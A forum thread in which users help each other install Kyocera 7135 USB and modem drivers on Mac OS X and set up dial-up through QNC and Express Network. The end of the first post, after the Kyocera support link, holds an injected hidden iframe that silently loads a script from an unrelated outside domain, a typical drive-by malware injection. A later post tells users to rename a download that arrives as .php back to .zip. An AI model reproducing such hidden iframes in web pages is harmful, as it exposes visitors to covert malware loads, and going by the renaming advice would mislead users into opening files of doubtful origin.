+ Reply to Thread
    LVC

MAC OS X Driver Update - Verizon

I just received USB driver updates from Kyocera (see attached zip file). Also in update are phone drivers to use 7135 as a Modem (for QNC and Express network). Please follow directions below and you should be all set.

---------
    Directions

1. Make sure the Kyocera USB cable is not plugged into the a MAC USB port.

2. Locate and Double-click on 'Kyocera Installer.pkg.sit.' After you click
    on 'Kyocera Installer.pkg.sit.' a file named 'Kyocera Installer.pkg' will be
    unstuffed.

3. Locate and Double-click on 'Kyocera Installer.pkg'.

4. After you double-click on 'Kyocera Installer.pkg' an Authorization box
    will appear. Click on the padlock at the bottom of the screen and type in
    your user name and password. Click 'OK' to continue.

5. After you click 'OK' an Installer Introduction screen will appear. Click
    on 'Continue'.

6. The next window will ask you to select the destination of where you want
    to install the USB drivers. Click on the Hard Drive icon and hit
    'Continue'.

7. The next window will ask you to select the Installation type. Click on
    'Install' or 'Upgrade' at the bottom of the window.

8. The following window will display a message letting you know that you
    must restart your MAC after the install. Click 'Continue Instal <<OS X USB
    files.zip>> lation' to move forward with the install.

9. Once the Install completes a final Installation window will appear. Click
    on 'Restart' on the bottom of this window. The MAC will restart at this
    point.

10. Plug in the USB cable and perform a Hotsync.

If your issue is still unresolved, do not hesitate to contact us again.
    Please refer to case number: 18876 when responding.

For any future issues, please visit: http://support.kyocera-wireless.com/
    to get instant graphical answers to your questions.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Attached Files

Copied to the FAQ section. Thanks LVC, and welcome to the board.

Questions:

1. What OSX sync problem does this solve?

I can sync my 7135 to OSX o.k. but all of my backups are reloaded again and have to do a soft reset which looses my prefs, is this what it solves?

2. Also the enclosed Kyocera Installer.pkg.sit files does NOT unstuff. Can you test it and reupload?

Thanks (sorry if this post got duplicated)

LVC
    Hi I've reattached file (see below).
    Pepole have been experiencing sporatic sync problems with the Kyo 7135 regardless of desktop platform (OS X or WINTEL). The attached file contains updated USB drivers for OS X that should provide a more stable sync experience. also in file are phone drivers to use 7135 as a modem for Mac. If you are still having sync problems after you install new updated USB drivers, it might be a piece of software that you transfered into phone during your first sync which means you need to do a clean install on all your software. ----which is what i had to do. It hurts but it requires unistalling palm desktop---getting rid of you back-up folder, doing a hard re-set and starting from scratch. Do a clean install on all Palm software one by one until you come up with the one that is causing the problem---delet that one and you should be fine.
    Attached Files

LVC, added your reply to the FAQ

LVC

Extension on Zip Changes when U Download

Just noticed that when you download zip file extension is somehow changed to a .php file (wierd) just change extension back to .zip by typing over .php and expand (just tried it) and it will work fine.
    Attached Files

I'm still having trouble getting connected thru my iBook....

Standard QNC (not Exp Net)...logging in as qnc/qnc, dialing into #777.

I get an Authentication error. Am I doing something wrong? My Kyo itself can connect via QNC, but my ibook won't connect thru the Kyo.

LVC
    Originally posted by jofo
    I'm still having trouble getting connected thru my iBook....

Standard QNC (not Exp Net)...logging in as qnc/qnc, dialing into #777.

I get an Authentication error. Am I doing something wrong? My Kyo itself can connect via QNC, but my ibook won't connect thru the Kyo.
    If you are running OS X....Mac should automatically sense the Kyo (it has the drivers already built in) You need to do the following
    1) make sure phone modem drivers are installed (1.2 for low speed as well as high speed---see OSX USB ZIP File in this thread) the modem files get installed in MAC HD/LIBRARY/MODEM SPRIPTS folder
    2) Plug Kyo with Datacable into USB Port
    3) open internet connect (Mac should automatically sense Kyo phone (if not leave internet connect opened and re-start
    4) Once Mac senses Kyo through internet connect go ahead and setup your ISP info and select the modem(1.2 or high speed--use high speed only if you have high speed service from verizon)
    5) On The Kyo open The Data/Fax application
    6) On the Mac (through internet connect) hit the connect button and you should be connected.

I tried it and it works

4) Once Mac senses Kyo through internet connect go ahead and setup your ISP info and select the modem(1.2 or high speed--use high speed only if you have high speed service from verizon)
    So i have to enter in my regular dial up ISP info? It's not QNC? With my 6035, I thought that's how I did it (I don't have those settings anymore).

LVC
    So i have to enter in my regular dial up ISP info? It's not QNC? With my 6035, I thought that's how I did it (I don't have those settings anymore).
    I would try setting the QNC on the MAC Internet connect as the dial out. Rememember the phone becomes the modem and Mac is dialing the modem. If you are accessing info directly from phone (No mac) See the following link on verizon QNC

http://www.mediabaron.com/qnc/

Originally posted by LVC
    [B]I would try setting the QNC on the MAC Internet connect as the dial out. Rememember the phone becomes the modem and Mac is dialing the modem. If you are accessing info directly from phone (No mac) See the following link on verizon QNC

uhh, that's what I did first. Mac OS X's PPP was set with qnc/qnc. I just tried it with using a dialup ISP, and it said "no carrier" (I duped the port, so the settings are the same).

I'll keep tryin'...

UPDATE: i think the qnc emethod is the way to go....it say authenticaation failed...is the pw supposed to be 'qnc'?

LVC

uhh, that's what I did first. Mac OS X's PPP was set with qnc/qnc. I just tried it with using a dialup ISP, and it said "no carrier" (I duped the port, so the settings are the same).

I'll keep tryin'...

UPDATE: i think the qnc emethod is the way to go....it say authenticaation failed...is the pw supposed to be 'qnc'?
    See my express network setup post---hopefully that will work for you.

Originally posted by LVC
    See my express network setup post---hopefully that will work for you.
    I'm not on express network. Which part of that post should I be looking at?

LVC
    I'm not on express network. Which part of that post should I be looking at?
    Look on main 7135 discussion menu
    http://www.smartphonesource.com/vbul...&threadid=6181

However the scripts for QNC are a bit different

I believe settings are a 2 for first script and 1 for second. Scout around board I have seen the QNC scripts posted

success

OK I got it! I used my cheapo ISP info on my Mac. Bit of a bummer, it'd be nice to just use VZW instead so I can ditch the isp.

Thanks for your help!

Once I confirm I can do this reliably, I'll be gettin' Express Net

7135 Modem Speed on Express Net with OSX

Hi,

My 7135 is wonderful except for the fact that they barely support the mac. I've dloaded all of the OSX drivers and have gotten the modem to work but I haven't been able to achiece high speeds on express network.

Is this due to a problem with this unofficial driver or some sort of compression software that is not supported on the mac?

Has anyone achieved speeds over 24000 on a mac?

On my PC I've had no probs exceeding ISDN every time every place. It's ridiculous that I can't do this on my mac.

Thanks,

jon

I am a MAC OSX user in serach of Photosuite/Photoview applications. I can't get the programs from the CD onto my MAC, is downloading them into a PC and then hotsyncing into my 7135 the answer? No one at Kyocera seems to know.
    -Sly

hi

Tim
    That app is Windows only. I use SplashPhoto for images. Hope this helps.